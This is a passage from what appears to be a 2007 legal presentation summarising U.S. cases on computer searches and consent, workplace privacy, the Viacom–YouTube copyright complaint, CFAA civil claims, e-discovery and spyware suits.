computer. Obtaining a warrant is adherence to the text of the Constitution, and in particular,
the Fourth Amendment. Under the attendant circumstances, the agent's statement to abide
by the Constitution and seek a warrant cannot be considered a threat.
Searches- Consent
U.S. v. Stierhoff, --- F.Supp.2d ----, 2007 WL 763984
(D. R.I. March 13, 2007)
Government exceeded scope of consent to
computer search, given by defendant arrested for
stalking, when conducting authorized search of
"creative writing" file authorities saw reference to
"offshore" file, which they opened without
warrant, discovering evidence of tax evasion.
Defendant a stalker
Consents to search of computer and instructs police
officers that files are located D:Drive MyFiles directory
Creative Writing folder.
$100,000+ in plain view, defendant admits he hasn’t paid
taxes in a while
Offshore folder on computer, officer looks at it
Search as to Offshore folder and derivative evidence
exceeded scope of consent
Searches- Consent
U.S. v. Dehghani, 2007 WL 710184 (W.D. Mo. March 06,
2007)
Police to defendants based upon allegation of child pornography
and associated screen name to residence.
Request for consent to search computer
On-Site attempt to analyze fails
Permission to take off-site granted
Off-site forensics reveals evidence
Defendant argues that the police had no search warrant, they did
not specifically state that his computer would be searched or
seized, they failed to seize the 25-30 CD's lying next to the
computer, failed to search another computer in the home.
It appears he may have believed the police would not have access
to the pornography on the computer because they did not have
defendant's passwords. However, defendant has offered no legal
authority for how his assumption, if indeed it existed, would
override his express voluntary consent to search his computer for
child pornography
Computer Search
Special Needs
United States v. Heckenkamp, --- F.3d ----, 2007 WL
1051579 (9th Cir. N.D. Cal. Apr 05, 2007)
Denial of motions to suppress evidence in a
prosecution for recklessly causing damage by
intentionally accessing a protected computer without
authorization are affirmed where: 1) although
defendant had a reasonable expectation of privacy in
his personal computer, a limited warrantless remote
search of the computer was justified under the
"special needs" exception to the warrant requirement;
and 2) a subsequent search of his dorm room was
justified, based on information obtained by means
independent of a university search of the room
Searches- Methods
U.S. v. Vilar, 2007 WL 1075041 (S.D.N.Y., Apr 04, 2007)
Warrant must state what materials to be seized from computer
it need not specify how computers will be searched.
There is no case law holding officer must justify the lack of a
search protocol in order to support issuance of the warrant.
Government not required to describe its specific search
methodology.
Warrant not defective because it did not include a computer
search methodology.
But see 3817 W. West End, 321 F.Supp2d at 960-62 requiring
that computer search warrant include a search protocol
Supreme Court has held that it is generally left to the
discretion of the executing officers to determine the details of
how best to proceed with the performance of a search
authorized by warrant.
Computer Search
Work Place
U.S. v. Barrows, --- F.3d ----, 2007 WL 970165 (10th
Cir. W.D. Okla. Apr 03, 2007)
Does defendant possess a reasonable expectation of
privacy in his personal computer he brought to work;
placed on a common desk; and, connected it via the city
network to the common computer sufficient to warrant
protection from a government search?
Focus on surrounding circumstances - (1) the employee's
relationship to the item seized; (2) whether the item was in
the immediate control of the employee when it was seized;
and (3) whether the employee took actions to maintain his
privacy in the item.
No password; left constantly in open area; and, knowingly
hooked PC up to network to share files
Computer Search
Private Search/Agent of Law Enforcement
U.S. v. Anderson, 2007 WL 1121319 (N.D. Ind., Apr
16, 2007)
Computer repair shop fixes computer, observes
numerous child pornography thumbnail images
Employees not agents of LEA, contracted to fix
operating system, opening files normal part of
checking to see if new installation of OS worked
When a private search has occurred, and the
government subsequently searches, whether the
Fourth Amendment is violated depends on the
degree to which the government's search
exceeds the scope of the private search.
Web Pages & ISP
Doe v. Mark Bates and Yahoo, Slip Copy, 2006 WL 3813758
(E.D.Tex. Dec. 27, 2006)
Yahoo not liable in civil case for child pornography online
group set up and moderated by a user on its servers.
User in jail
Civil suit targeted the ISP, Court ruled Section 230 immunity,
even though alleged Yahoo broken law by hosting child porn.
No civil cases against site owners or hosting providers using
allegation of criminal conduct to get around Section 230. Law
intended to foster self-regulation of obscene and illegal
content by service providers, and immunity is an important
aspect of that.
Court - to allow suits on either basis (alleging criminal activity,
or that any level of regulation creates liability) would have a
chilling effect on online speech, which is something Congress
didn't want to do in enacting the law.
Copyright – The Complaint
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
YouTube has harnessed technology to willfully infringe
copyrights on a huge scale
YouTube’s brazen disregard of the intellectual property
laws
Defendants actively engage in, promote and induce this
infringement. Youtube itself publicly performs the
infringing videos…It is YouTube that knowingly
reproduces and publicly performs the copyrighted works
uploaded to its site.
..have done little to nothing to prevent this massive
infringement
Copyright – The Complaint
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
YouTube deliberately built up a library of infringing works
to draw traffic to the Youtube site
Because Youtube directly profits from the availability of
popular infringing works on its site, it has decided to shift
the burden entirely onto copyright owners to monitor the
YouTube site on a daily or hourly basis to detect infringing
videos and send notices to Youtube demanding that it
“take down” the infringing works.
In many instances the very same infringing video remains
on Youtube because it was uploaded by at least one other
user, or appears on Youtube again within hours of its
removal.
YouTube allows its users to make the hidden videos
available to others through YouTube features like the
“embed” “share” and “friends” functions
Copyright – The Complaint
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
YouTube has filled its library with entire episodes and
movies and significant segments of popular copyrighted
programming… When a user uploads a video, Youtube
copies the video in its software format, adds it to its own
servers, and makes it available for viewing on its own
website. A user who wants to view a video goes to the
YouTube site by typing www.youtube.com into the user’s
web browser, enters search terms into a search and
indexing function provided by YouTube for this purpose
on its site, and receives a list of thumbnails of videos in
the YouTube library matching those terms. Youtube
creates the thumbnails, which are individual frames from
videos in its library – including infringing videos – for the
purpose of helping users find what they are searching for.
Copyright – The Complaint
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
YouTube then publicly performs the chosen video by
sending streaming video content from YouTube’s servers
to the user’s computer… YouTube prominently displays its
logo, user interface, and advertising to the user. Thus the
YouTube conduct that forms the basis of this Complaint is
not simply providing storage space, conduits, or other
facilities to users who create their own websites with
infringing materials. To the contrary, YouTube itself
commits the infringing duplication, public performance
and public display of Plaintiff’s copyrighted works, and
that infringement occurs on YouTube’s own website, which
is operated and controlled by Defendants, not users.
Copyright – The Complaint
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
YouTube also allows any person to “embed” any video
available in the YouTube library into another website (such
as a blog, MySpace page, or any other page on the web
where the user can post material). … the user simply
copies the “embed” code, which YouTube supplies for
each video in its library, and then pastes that code into the
other website, where the embedded video will appear as a
television shaped picture with the YouTube logo
prominently displayed…When a user clicks the plat icon,
the embedded video plays within the context of the host
website, but it is actually YouTube, not the host site, that
publicly performs the video by transmitting the streaming
video content from YouTube’s own servers to the viewer’s
computer.
Copyright – The Complaint
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
Defendant’s have actual knowledge and clear notice of this
massive infringement, which is obvious to even the most casual
visitor to the site…. YouTube has the right and ability to control
the massive infringement…Youtube has reserved to itself the
unilateral right to impose Terms of Use to which users must agree
… Youtube has the power and authority to police what occurs on
its premise…. YouTube imposes a wide number of content based
restrictions … reserves the unfettered right to block or remove
any video.. Inappropriate. YouTube proactively reviews and
removes pornographic videos.
Copyright – The Complaint
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
YouTube has failed to employ reasonable measures that
could substantially reduce or eliminate the massive amount
of copyright infringement…Youtube touts the availability
of purported copyright protection tools… these tools
prevent the upload of the exact same video . . . . However,
users routinely alter as little as a frame or two of a video
and repost it on Youtube.
Copyright
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
Count I – Direct Copyright Infringement – Public
performance
Count II – Direct Copyright Infringement – Public
Display
Count III – Direct Copyright Infringement –
Reproduction
Count IV – Inducement of Copyright Infringement
Count V – Contributory Copyright Infringement
Count VI – Vicarious Copyright Infringement
Copyright- The Answer
Viacom International, Inc. v. YouTube, LLC and Google, Inc.,
Civil Action No. 07 CV 2103 (S.D.N.Y. March 13, 2007)
Section 512 (safe harbor) hosting companies not liable, as long as
they don't turn a blind eye to copyright infringement and if they
remove infringing material when notified.
YouTube does the second part through a formal posted policy and it
prohibits uploads of unauthorized videos more than 10 minutes in
length.
Google confident that YouTube respects the legal rights of copyright
holders and predicts courts will agree that the safe harbor applies
only if the Web site does not financially benefit directly from the
alleged infringing work. Attorneys for Google said Section 512
provides more than an ample shield that Web hosting companies like
YouTube and blogging services enjoy a safe harbor.
Section 512 says Web site operators must not "receive a financial
benefit directly attributable to the infringing activity" and that they
must not be "aware of facts or circumstances from which infringing
activity is apparent."
Copyright- The Answer
Viacom International, Inc. v. YouTube, LLC and Google,
Inc., Civil Action No. 07 CV 2103 (S.D.N.Y. March 13,
2007)
Viacom’s complaint threatens the way hundreds of millions of
people legitimately exchange information, news,
entertainment, and political and artistic expression.
Google and YouTube comply with safe harbor obligations and
go well above and beyond what the law requires
Copyright
MGM Studios, Inc., v. Grokster, Ltd., 2005 U.S. LEXIS 5212 (U.S. June 27, 2005)
Petitioner copyright holders sued respondent software distributors, alleging
that the distributors were liable for copyright infringement because the
software of the distributors was intended to allow users to infringe
copyrighted works. Upon the grant of a writ of certiorari, the holders
appealed the judgment of the United States Court of Appeals for the Ninth
Circuit which affirmed summary judgment in favor of the distributors. The
distributors were aware that users employed their free software primarily to
download copyrighted files, but the distributors contended that they could
not be contributorily liable for the users' infringements since the software
was capable of substantial noninfringing uses such as downloading works in
the public domain. The U.S. Supreme Court unanimously held, however, that
the distributors could be liable for contributory infringement, regardless of
the software's lawful uses, based on evidence that the software was
distributed with the principal, if not exclusive, object of promoting its use to
infringe copyright. In addition to the distributors' knowledge of extensive
infringement, the distributors expressly communicated to users the ability of
the software to copy works and clearly expressed their intent to target
former users of a similar service which was being challenged in court for
facilitating copyright infringement. Further, the distributors made no
attempt to develop filtering tools or mechanisms to diminish infringing
activity, and the distributors' profit from advertisers clearly depended on
high-volume use which was known to be infringing. The judgment affirming
the grant of summary judgment to the distributors was vacated, and the case
was remanded for further proceedings.
Electronic Discovery
Cenveo Corp. v. Slater, 2007 WL 442387 (E.D. Pa.
Jan. 31, 2007)
Court - because of the close relationship between plaintiff's
claims and defendants' computer equipment, court set out
a detailed three step process
Imaging
Plaintiff select computer expert, NDA Signed
Defendant’s computers available at business
Defendant may have expert present
Recovery
All files, including deleted
Notice to Defendants
Disclosure
Within 45 days comments on disclosure
D Orders
Warshak v. United States, --- F.3d ----, 2007 WL
1730094, (6th Cir. Ohio June 18, 2007)
Warshak v. United States, 2006 U.S. Dist. LEXIS
50076 (W.D. Ohio July 21, 2006)
D Orders
District court correctly determined e-mail users maintain a reasonable
expectation of privacy in content of their e-mails, injunctive relief crafted
was largely appropriate, we find necessary one modification. On remand,
the preliminary injunction should be modified to prohibit the United States
from seizing the contents of a personal e-mail account maintained by an
ISP in the name of any resident of the Southern District of Ohio, pursuant
to a court order issued under 2703(d), without either (1) providing the
relevant account holder or subscriber prior notice and an opportunity to be
heard, or (2) making a fact-specific showing that the account holder
maintained no expectation of privacy with respect to the ISP, in which case
only the ISP need be provided prior notice and an opportunity to be heard.
United States v. Adjani, 452 F.3d 1140 (9th Cir. Cal. July 11, 2006)
Government sought review of an order from the Court which granted a
motion filed by defendant and codefendant to suppress their e-mail
communications in their trial on charges of conspiring to commit
extortion and transmitting a threatening communication with intent to
extort in violation.
While executing a search warrant at defendant's home to obtain
evidence of his alleged extortion, agents from the Federal Bureau of
Investigation seized defendant's computer and external storage
devices, which were later searched at an FBI computer lab. The agents
also seized and subsequently searched a computer belonging to
codefendant, who lived with defendant, even though she had not been
identified as a suspect and was not named as a target in the warrant.
Searches
United States v. Adjani, 452 F.3d 1140 (9th Cir. Cal. July 11, 2006)
Although individuals undoubtedly have a high expectation of privacy
in the files stored on their personal computers, we have never held that
agents may establish probable cause to search only those items owned
or possessed by the criminal suspect. The law is to the contrary. "The
critical element in a reasonable search is not that the owner of the
property is suspected of crime but that there is reasonable cause to
believe that the specific 'things' to be searched for and seized are
located on the property to which entry is sought." Zurcher v. Stanford
Daily, 436 U.S. 547, 556, 98 S. Ct. 1970, 56 L. Ed. 2d 525 (1978); cf.
United States v. Ross, 456 U.S. 798, 820-21, 102 S. Ct. 2157, 72 L. Ed.
2d 572 (1982)
Searches
Seizures
United States v. Olander, 2006 U.S. Dist. LEXIS 66824 (D. Ore.
September 18, 2006)
Warrant at issue sought authority to search for and seize any
computer hardware, software, or storage devices that could
contain evidence of Olander's means to access, store, and view
child pornography. Defendant voluntarily subjected external
portions of his computer to expert examination, after his
computer was reasonably viewed as possibly part of the "entire
computer system" used by David Olander and could have
contained evidence of David Olander's crimes.
Seizures
United States v. Olander, 2006 U.S. Dist. LEXIS 66824 (D. Ore.
September 18, 2006)
The computer was seized properly under the warrant as a possible
instrumentality of the crimes being investigated. The warrant
allowed agents to search for and to seize "instrumentalities" that
may contain evidence of the crime of possession of child
pornography. There was a fair probability that defendant's
computer contained evidence of David Olander's crimes and may
have facilitated the commission of those crime. "The critical
element in a reasonable search is not that the owner of the property
is suspected of crime but that there is reasonable cause to believe
that the specific 'things' to be searched for and seized are located on
the property to which entry is sought."
Searches
United States v. Hibble, 2006 U.S. Dist. LEXIS 65421 (D. Ariz.
September 11, 2006)
Defense counsel objects to the Magistrate Judge's R & R because
he misunderstood the use and operation of computers, the internet,
and technology and was, therefore, mislead by the Government
into believing that there was an unequivocal factual basis to
support the search warrant. The Defendant argues that the
Magistrate Judge should have heard testimony from his expert
regarding the inexactitude of the facts relied on to establish
probable cause as follows: 1) Internet Protocol Addresses; 2)
Activity on Defendant's Computer; 3) Dates and Times of
Activities; 4) Where did the Files Come From; 5) File Names; 6)
Need More Sources; 7) Banning Users; 8) Hackers and Spoofers,
and 9) Investigative Tools.
Searches
United States v. Hibble, 2006 U.S. Dist. LEXIS 65421 (D. Ariz.
September 11, 2006)
Defendant used an unsecured wireless router to access the internet.
Defendant challenges the Government's claim that SA Andrews
downloaded files from Defendant's computer because the files
could have easily been downloaded from another computer that
was accessing the Defendant's IPA. Also anyone that accesses the
IPA through an unsecured wireless router can remotely access
Defendant's computer and files can be downloaded, uploaded, or
deleted from the Defendant's computer without the Defendant even
knowing it. Defendant argues that SA Andrews should have
confirmed that it was in fact Defendant's activity emanating from
the Defendant's computer
Searches
United States v. Larson, 2006 CCA LEXIS 362, (A.F. Ct
of Crim Aps. December 7, 2006)
The military appellate court first held that the servicemember
had no reasonable expectation of privacy in the Internet
history files of the government computer which were recorded
automatically as part of the computer's operating system.
Searches
United States v. Steiger, 2006 U.S. Dist. LEXIS 89832
(M. Dt. Ala. September 7, 2006)
Defendant’s issues:
(1) An anonymous hacker who provided information to police
concerning Steiger was an agent of the government therefore
search violated Fourth Amendment.
(2) Government's search warrant affidavit omitted material
information by failing to state that hacker had obtained
information about Steiger through the unauthorized search of
his computer files.
Searches
United States v. Ziegler, 474 F.3d 1184 (9th Cir. Mont.
January 30, 2007)
Employer consented to search of hard drive of defendant's
workplace computer therefore a warrantless search of
computer was reasonable under the Fourth Amendment.
Co-workers, acting at direction of federal agent, who entered
defendant's office at night to copy hard drive of defendant's
workplace computer received consent to search defendant's
office and key to defendant's office from employer's chief
financial officer
Court must determine whether an employee has an expectation
of privacy in his workplace computer sufficient to suppress
images of child pornography sought to be admitted into
evidence in a criminal prosecution.
Searches
Soderstrand v. State ex rel. Bd. of Regents of Okla. Agric.
& Mech. Colleges, 2006 U.S. Dist. LEXIS 85402 (W. D.
Okla. November 22, 2006)
Plaintiff department head alleged that his personal laptop
computer was improperly taken from his office at Oklahoma
State University. The petition alleged a state law claim for
conversion, and a federal claim against defendants, security
analyst, dean, and associate dean, for unreasonable search and
seizure in violation of the Fourth Amendment to the United
States Constitution. The parties moved for summary judgment.
Court held dean, associate dean, and security analyst were
entitled to qualified immunity. Search of hard drive was
justified at inception and its scope was reasonably related to
the circumstances which justified it. Evidence showed no
conduct violated the Fourth Amendment
Searches
United States v. Hassoun, 2007 U.S. Dist. LEXIS 3404 (S.D. Fla.
January 17, 2007)
FBI seized two computer disks from Defendant's work area
and copied two hard drives and email associated with the
Defendant located on the Defendant's work computer. Prior to
search employer executed a Consent to Search Form. After
June seizure Government obtained a warrant to search and
seize contents of two seized computers and email
Defendant argues the warrant violates Fourth Amendment by
failing to describe with sufficient particularity the items to be
seized. Second, that S & S exceeded scope of the warrant.
Third, agents knowingly or recklessly included a material false
statement in the affidavit in support of the search warrant.
Defendant did not have legitimate expectation of privacy in the
work computer, related components and email seized.
Searches
United States v. Venkataram, 2007 U.S. Dist. LEXIS 852, (S.D.N.Y.
January 5, 2007)
In order for the warrantless search of Defendant's offices to be
illegal, Defendant must first show that he had a reasonable
expectation of privacy in the areas searched at the time of the
search, after which he must still show that the search was
unreasonable. See O'Connor v. Ortega, 480 U.S. 709, 107 S. Ct.
1492, 94 L. Ed. 2d 714 (1987). Traditionally, to make this
showing, the defendant "must demonstrate (1) that he had an
expectation of privacy that society is prepared to consider
reasonable and (2) that he had acted in a way with respect to
the property in question that indicated a subjective expectation
of privacy." Shaul v. Cherry Valley-Springfield Cent. Sch., 363
F.3d 177, 181-82 (2d Cir. 2004). The burden of showing
standing -- "that he had a legitimate expectation of privacy" --
to object to the legality of a search rests with the defendant.
Rawlings v. Kentucky, 448 U.S. 98, 104-05, 100 S. Ct. 2556, 65 L.
Ed. 2d 633 (1980).
CFAA –Civil Litigation
Chas. S. Winner, Inc. v. Polistina, 2007 WL
1652292 (D.N.J. June 04, 2007)
The CFAA was historically a criminal statue
penalizing unauthorized access, i.e., “hacking”
into computers. The CFAA has been used
increasingly in civil suits by employers to sue
former employees and their new companies for
misappropriation of information from the
employer's computer system.
CFAA –Civil Litigation
L-3 Communications Westwood Corp. v. Robicharux, 2007 WL
756528 (E.D. La. Mar 08, 2007)
Defendant employees of L-3
Computer forensics shows 110,000 files copied to 120 GB
external hard drive.
L-3's loss of trade secrets and lost profits not contemplated by
the CFAA. Losses under CFAA are compensable when they
result from damage to a computer system or the inoperability
of the accessed system. CFAA permits recovery for loss
revenue only where connected to an interruption of service.
There is no allegation that there was damage to L-3's computer
or an interruption of service in this case.
Because L-3 has not asserted that there was damage to their
computers or an interruption of service, it has not alleged a
cognizable loss under the CFAA. Accordingly, L-3 has not
demonstrated a likelihood of success on the merits of the
CFAA claim.
CFAA –Civil Litigation
P.C. of Yonkers, Inc. v. Celebrations! The Party and Seasonal
Superstore, L.L.C., 2007 WL 708978 (D. N.J. Mar 05, 2007)
CFAA's private cause of action sets forth a two-part injury
requirement. Plaintiff must:(1) suffer a root injury of damage or
loss; and (2) suffer one of five operatively-substantial effects set
forth in subsection (a)(5)(B)(i)-(v).
(i) loss to 1 or more persons during any 1-year period (and, for purposes of an
investigation, prosecution, or other proceeding brought by the United States
only, loss resulting from a related course of conduct affecting 1 or more other
protected computers) aggregating at least $5,000 in value;
(ii) the modification or impairment, or potential modification or impairment,
of the medical examination, diagnosis, treatment, or care of 1 or more
individuals;
(iii) physical injury to any person;
(iv) a threat to public health or safety; or
(v) damage affecting a computer system used by or for a government entity in
furtherance of the administration of justice, national defense, or national
security.
CFAA –Civil Litigation
P.C. of Yonkers, Inc. v. Celebrations! The Party and Seasonal
Superstore, L.L.C., 2007 WL 708978 (D. N.J. Mar 05, 2007)
No damage to the data, system, or information on Plaintiffs'
computers is alleged within Plaintiffs' CFAA claims
Loss, treated separate from damage under the CFAA, is defined as
"any reasonable cost to any victim, including the cost of
responding to an offense, conducting a damage assessment, and
restoring the data, program, system, or information to its
condition prior to the offense, and any revenue lost, cost incurred,
or other consequential damages incurred because of interruption
of service.
The plain language of the CFAA treats lost revenue as a different
concept from incurred costs, and permits recovery of the former
only where connected to an interruption in service.
Plaintiffs have alleged that as a result of Defendants' unauthorized
access and use of the information they have suffered and will
continue to suffer substantial losses in excess of $5,000.00,
including but not limited to losses sustained in responding to
defendants' actions, investigating defendants' actions and taking
remedial steps to prevent defendants' further actions.
CFAA –Civil Litigation
PharMerica, Inc. v. Arledge, 2007 WL 865510
(M.D. Fla. March 21, 2007)
Arledge top level of PharMerica’s management team
March 9, 2007, Arledge resigns – becomes VP at Omnicare
PharMerica examines laptop computer Arledge used and
discovers several thousand e-mails on the laptop but that the
hard drive “C” drive was virtually empty
March 14, 2007, PharMerica learned that:
February 13, 2007, Arledge downloaded a copy of the Mercer Report,
which was marked “CLEAN” (regarding PharMerica's hub and
spoke system), to an external personal AOL account
( [email protected] ) Later that day, Arledge met President and
Executive Vice-President of Omnicare at Omnicare's headquarters
March 7, 2007, two days prior to his resignation, Arledge copied
almost all of his electronic files from his work computer and then
permanently deleted most of those files, 475 of these files
CFAA –Civil Litigation
PharMerica, Inc. v. Arledge, 2007 WL 865510 (M.D. Fla.
March 21, 2007)
TRO Granted - Arledge Ordered to:
a. Immediately return to PharMerica any and all documents, data, and
information Arledge has taken from PharMerica and enjoining any use or
disclosure of PharMerica's Confidential Information;
b. Immediately cease use or deletion of any materials from the computer to
which he sent or uploaded PharMerica documents and any and all other
computers, equipment, USB storage devices, hard drives, PDA's, or any similar
device on which data may be stored, in his custody, possession or control (“the
Computer Equipment”).
c. Within two days of his receipt of the Order, deliver the Computer Equipment to
PharMerica's computer expert, Adam Sharp, E-Hounds, Inc., 2045 Lawson Road,
Clearwater, Florida 33763, so that PharMerica's expert can examine and copy the
information on the computer Equipment.
d. Within ten days of his receipt of the Order, appear for deposition by
PharMerica.
e. Immediately postpone beginning his new employment with Omnicare until at
least 10 days after all of the above requirements are met; the deposition is
concluded; and, allow PharMerica time to seek additional relief if necessary
Corporate Lawsuits
Advanced Micro Devices, inc. v. Intel Corp., (D. Del. Filed
June 27, 2005)
Electronic Mail Retention Policy - Intel
Discovery Millions of E-Mails
Intel’s document retention policy instructs users to move e-mails
off their PCs onto hard drive.
Some employees fail to do so.
Intel has automatic e-m,ail deletion system, activates every couple
or so months
Discovery
Memry Corp. v. Kentucky Oil Technology, N.V., 2007
WL 832937 (N.D. Cal. Mar 19, 2007)
STC alleges that many of the documents produced by KOT have
not been originals and have been produced in such a way as to
obscure important information. STC also alleges that KOT has
failed to produce numerous responsive documents, thus warranting
full disclosure of KOT's computer hard drives
Case different from cases where courts allowed independent
experts to obtain and search a "mirror image." Those cases all
involve an extreme situation where data is likely to be destroyed or
where computers have a special connection to the lawsuit.
Main allegation of complaint defendants improperly used their employer's
computers to sabotage the plaintiff's business. Ameriwood Industries, Inc. v
Liberman, 2006 WL 3825291 (E.D. Mo. Dec. 27, 2006)
Limited discovery of mirror image of hard drives where alleged defendants
had launched attacks on plaintiff's file servers, and electronic data related to
those attacks was apparently on the computers. Physicians Interactive v.
Lathian sys. Inc., 2003 WL 23018270 (E.D. Vir. Dec 5, 2003)
Hard drive mirroring allowed where defendants' continuous use of computers
was making it likely that relevant electronic data would be overwritten before
it could be accessed in the normal course of discovery. Antioch Co. v
Scrapbook Borders, Inc., 210 F.R.D. 645 (D. Minn 2002)
Metadata & Use in Lawsuits
E-Discovery in effect December 1, 2006
One federal Case – Produce documents with Metadata
intact
Parties free to negotiate how to handle metadata
Discovery
Discovery
Rozell v. Ross, 2006 U.S. Dist. LEXIS 2277 (S.D.N.Y. Jan 20, 2006)
When plaintiff claims that a defendant improperly accesses her
e-mail account does every email transmitted through that
account becomes subject to discovery. Plaintiff asserted claims
of: (1) sexual harassment and retaliation in violation of Title
VII of the Civil Rights Act of 1964, the New York State Human
Rights Law, and the New York City Human Rights Law, (2)
violation of the ECPA 18 USC § 2701; and (3) computer
trespassing. Defendants now move pursuant to compel
production of e-mails sent through the plaintiff's account. For
the reasons discussed below, the defendants' motion is granted
in part and denied in part.
Discovery
Whatley v. S.C. Dep't of Pub. Safety, 2007 U.S. Dist. LEXIS 2391 (D.
S.C. January 10, 2007)
Electronic mail communications can normally be
authenticated by affidavit of a recipient, comparison of
the communications content with other evidence, or
statements or other statements from the purported
author acknowledging the email communication.
Discovery
Hawkins v. Cavalli, 2006 U.S. Dist. LEXIS 73143 (N.D. Cal.
September 22, 2006)
Issue- Trial Court's admission of computer records were
unreliable and violated due process rights
Held- In upholding the admission of the evidence, the
California Court of Appeal was persuaded by a Louisiana case,
which held that printouts of the results of a computer's internal
operations are not hearsay, because they are not statements,
nor are they representations of statements placed into the
computer by out of court declarants. State v. Armstead, 432
So.2d 837, 840 (La. 1983). Under Armstead, the test for
admissibility of a printout reflecting a computer's internal
operations is not whether the printout was made in the regular
course of business, but whether the computer was functioning
properly at the time the printout was produced.
Discovery
Hawkins v. Cavalli, 2006 U.S. Dist. LEXIS 73143 (N.D. Cal.
September 22, 2006)
Some courts consider all computer records hearsay, admissible
only under the business records or public records exceptions.
Other courts distinguish between computer-stored records and
computer-generated records. These courts have held that computer-
generated records are not hearsay because they are independent of
human observations and reporting. Id. at 157-58; see also, e.g.,
United States v. Khorozian, 333 F.3d 498, 505 (3d Cir. 2003)
(citing Mueller & Kirkpatrick, Federal Evidence, § 380, at 65 (2d
ed. 1994)) (holding that a header generated by a fax machine was
not hearsay, because "nothing 'said' by a machine... is hearsay");
United States v. Hamilton, 413 F.3d 1138, 1142 (10th Cir. 2005)
(holding that header information accompanying pornographic
images uploaded to the internet were not hearsay). These courts
have reasoned that because the computer instantaneously generated
the header information without the assistance of a person, there
was neither a "statement" nor a "declarant."
Discovery
Mackelprang v. Fid. Nat'l Title Agency of Nev., Inc., 2007 U.S. Dist.
LEXIS 2379 (D. Nev January 9, 2007)
Defendant also argues that it is entitled to obtain production of the
Myspace.com private email communications because they may
contain statements made by Plaintiff and witnesses about the
subject matter of this case which could presumably constitute
admissions by Plaintiff or which could potentially be used to
impeach the witnesses' testimony. In addition, Defendant argues
that the private email messages may contain information that
Plaintiff's alleged severe emotional distress was caused by factors
other than Defendant's alleged sexual harassment misconduct.
Discovery
Mackelprang v. Fid. Nat'l Title Agency of Nev., Inc., 2007 U.S. Dist.
LEXIS 2379 (D. Nev January 9, 2007)
The Myspace.com accounts were opened several months after
Plaintiff left Defendant's employment. Assuming that the
Myspace.com account contains sexually related email messages
exchanged between Plaintiff and others, such evidence would not
be admissible to support Defendants' defense that their prior
alleged sexual conduct was welcomed by Plaintiff. The courts
applying Rule 412 have declined to recognize a sufficiently
relevant connection between a plaintiff's non-work related sexual
activity and the allegation that he or she was subjected to
unwelcome and offensive sexual advancements in the workplace.
Ordering Plaintiff to execute the consent and authorization form for
release of all of the private email messages on Plaintiff's
Myspace.com internet accounts would allow Defendants to cast too
wide a net for any information that might be relevant and
discoverable.
Discovery
Oscher v. Solomon Tropp Law Group, P.A. (In re Atl. Int'l Mortg.
Co.) 2006 Bankr. LEXIS 2487 (August 2, 2006)
The trustee argued that the law firm, after having notice of its duty
to preserve electronic evidence, either lost or destroyed backup
tapes for the years most relevant to the firm's representation of the
debtor. The court found that the law firm and its counsel responded
to legitimate discovery requests with disingenuousness,
obfuscation, and frivolous claims of privilege and that they twice
filed meritless appeals of non-appealable discovery orders in
attempts to prevent meaningful discovery by the trustee. The court
concluded that the conduct of the firm and its counsel was totally
devoid of the cooperation required by the rules governing
discovery and that monetary sanctions were appropriate.
Discovery
Potter v. Havlicek, 2007 WL 539534 (S.D.Ohio, February 14, 2007)
Before the Court is a motion requesting an injunction forbidding
Defendant Jeffery Havlicek from “any use, disclosure, copying,
dissemination or destruction of electronic communications,
electronic files, data recordings, audio recordings, video
recordings, and any other documents, objects, information, or data,
in his possession or control which contain or relate to any
statements, communications, writings, thoughts, images, sounds,
ideas or personal information of Plaintiff Christina Potter.”
E-Discovery
Scotts Co. LLC v. Liberty Mut. Ins. Co., 2007 WL
1723509 (S.D.Ohio, Jun 12, 2007)
... entitled to an order, in the form proposed by plaintiff,
that would require defendant to allow a forensic expert to
search defendant's computer systems, network servers and
databases and would require defendant to provide back up
tapes of certain information systems ...
Privacy
State of New Jersey v. Reid, No. A-3424-05T5, 2007 WL 135685
(N.J. Super. Ct. App. Div. Jan. 22, 2007).
New Jersey Constitution provides for protection on information
held by third parties.
Spyware
Sotelo v. Directrevenue, 2005 U.S. Dist. LEXIS 18877, (N.D. Ill.
August 29, 2005)
Plaintiff computer user brought a class action suit against defendants for
trespass to personal property, unjust enrichment, negligence, and violation of
Illinois consumer fraud and computer tampering statutes. After removing the
suit to federal court, defendants filed motions to dismiss and to stay in favor
of arbitration.
Sotelo v. Ebates Shopping.com, Inc., 2006 U.S. Dist. LEXIS 83539
(N.D. Ill Nov. 13, 2006)
Plaintiff filed his complaint on behalf of two classes--a nationwide class (Class
A) and an Illinois class (Class B). Ebates is incorporated in California and
has its principal place of business there. In the complaint, Plaintiff alleges on
behalf of both classes that Ebates caused a software program, Moe Money
Maker, to be downloaded onto users' computers, without the users' consent in
violation of: 1) the Computer Fraud and Abuse Act, 2) the Electronic
Communications Privacy Act, 18 U.S.C. § 2707, 2520; and 3) the California
Business and Professional Code.
Civil Suits
Butera & Andrews v. IBM, 2006 U.S. Dist. LEXIS 75318 (D. D.C.
October 18, 2006)
Butera & Andrews brings this action against IBM and an
unidentified John Doe defendant, seeking monetary damages and
injunctive relief for alleged interference with the plaintiff's
computer records in violation of the Computer Fraud and Abuse
Act, the Stored Wire and Electronic Communications Act, and
the Federal Wiretap Ac. The plaintiff contends that the alleged
violations were committed "with IBM owned or operated
equipment and were directed by IBM employees or agents." The
plaintiff asks that "all information illicitly obtained from [the]
plaintiff" be returned," and that the defendants pay the plaintiff for
its damages, "including damages for items illicitly taken, the costs
of investigation, the cost of additional security measures, statutory
damages and attorney's fees for this action," Defendant moves to
dismiss Court grants IBM's motion.
Civil Suits
ViChip Corp. v. Tsu-Chang Lee, 2006 U.S. Dist. LEXIS 41756 (N.D.
